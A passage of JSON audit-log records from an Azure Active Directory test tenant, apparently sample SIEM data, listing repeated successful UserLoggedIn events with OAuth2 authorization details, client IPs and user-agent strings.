"ac8fcffb-7c44-498d-ad6b-24b85a3a1b59"} -{"InterSystemsId": "9fc4af4c-bf19-4f88-92ac-0fd029ca21bd", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:36", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
"RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "56fa424b-64bd-4ea5-abc4-38256f8a5600", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "880fb7bc-5708-42d1-86a8-760c32ac5e6b"} -{"InterSystemsId": "a35e980b-88be-4343-9691-629473e01983", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:38:37", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "79.159.10.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "78a2aa65-5026-4124-970a-00e06dc7df00", "ExtendedProperties": [{"Name": "UserAgent", "Value": 
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "30c7afcc-f74d-4b5a-898e-ce72da9386b8"} -{"InterSystemsId": "a89e9b3b-b394-4ecf-8abc-a3f6aaf9237f", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-06T09:28:00", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "bfe22fb6-c763-4972-91a7-5b13d3d51400", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "d4f90f07-f5c4-4b36-a81c-6c9bae8660d6"} -{"InterSystemsId": "aca3d9a3-792d-4357-87c6-ef50c3215baa", "OrganizationId": 
"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:28:52", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "f67a1615-4606-4673-b6fb-68f714fa2200", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "d2ad235b-d73f-4bd8-8aef-6e4909ee1b7c"} -{"InterSystemsId": "ae211253-88cf-4921-9014-2f9beab64fb0", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:37", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": 
"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "ccfec0f3-498b-43b1-a4c0-fb42f0fb5300", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "8ff18278-32ca-49d1-8658-91e577e0854f"} -{"InterSystemsId": "b3997fcc-6b0e-45b1-b88d-b4ee4a8a7ddc", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:28:52", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "c1ffa732-6576-4f86-9294-44387abc1f00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": 
"RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "a3939990-f7b4-4dc5-af4d-42b70a9485ea"} -{"InterSystemsId": "b3ab6d58-7b90-45d6-95e3-ee11333ebc34", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:01", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "d949d6c2-472e-4901-bd70-96cb90424c00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "61ba70f4-bd75-4bc2-a681-2e219d920e63"} -{"InterSystemsId": "b5c5fd00-b659-413e-8739-6271a4d70506", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:53:12", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 
5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "79.159.10.151", "ApplicationId": "80ccca67-54bd-44ab-8625-4b79c4dc7775", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "fabbe34e-a6dd-46f8-805f-4ca633c2ae00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "3e17bf8e-92de-45b6-b668-7618ab0e0c95"} -{"InterSystemsId": "b744259e-13e0-43d7-9f56-82cdbd54cf7c", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:52:06", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "79.159.10.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": 
"5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "ce9f104d-1a1b-488e-9313-b9729e99c400", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "f100d714-ffa2-4077-bf90-2f57a3b366c0"} -{"InterSystemsId": "b7d9a234-9fdd-4e36-9cf3-fd825f22697a", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-08T14:33:50", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "37.29.234.179", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "37.29.234.179", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "49092519-a590-4207-b1b3-1d49f9100a00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": 
"UserLoggedIn", "Id": "4b0f0d57-0766-4621-8aa0-04b8d8b63a78"} -{"InterSystemsId": "bb677f9e-953a-4bde-bb91-0ef8209200a1", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:38", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "1da3c318-642f-48dc-836b-e83b27655b00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "8d9a1fa8-7b85-4c5d-9e96-5728d572fb95"} -{"InterSystemsId": "c355f078-53d7-4d60-b836-851a09a98208", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:05", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "213.97.47.133", "UserId": "asr@testsiem.onmicrosoft.com", 
"UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "213.97.47.133", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "20e56367-e902-4200-855b-2ef7b99e5f00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "9756fe5b-ea0d-42fa-a665-be8e0eb100e5"} -{"InterSystemsId": "c5874ff2-7c53-4d51-9252-7abbf0524b1c", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:28:51", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "3188aef9-6b4e-44f2-8455-c28b49552200", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": 
"UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "abbf584f-b3a9-4b6d-9b37-4cc4b802ca4d"} -{"InterSystemsId": "cf2168a1-6537-4ed6-80a5-797c3458180c", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:25:21", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "23f53edd-63a7-4292-9d80-4fbc49c11e00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "d137a5e4-7004-493a-acca-5fb167d1f207"} -{"InterSystemsId": "d21f6867-0670-4c94-b6fa-bde326fcf3c6", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:38:20", "Actor": [{"Type": 0, 
"ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "79.159.10.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "1fa4819f-605a-4ebe-a2c3-bc11c3f8e200", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "73f0a2ef-35be-4a71-9545-59d879fc8fb2"} -{"InterSystemsId": "d5effb7f-9d39-4893-90f6-9cfeec7ed1a7", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:02", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "213.97.47.133", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "213.97.47.133", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", 
"ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "f22a3ad7-22e7-4296-a600-e4e9161a6000", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "3783acda-5ded-4d69-95b6-3df5344c0ce0"} -{"InterSystemsId": "d960e058-1adb-4a84-a65b-1a6ce367e323", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:03", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "213.97.47.133", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "213.97.47.133", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "1dfdb693-18a1-4cff-aa3e-61feaa356100", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
"AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "f67568b1-64c4-4165-bdd9-16a5b9142eef"} -{"InterSystemsId": "e2565aaf-91b0-4ccd-8810-743123eb7383", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:29:02", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], 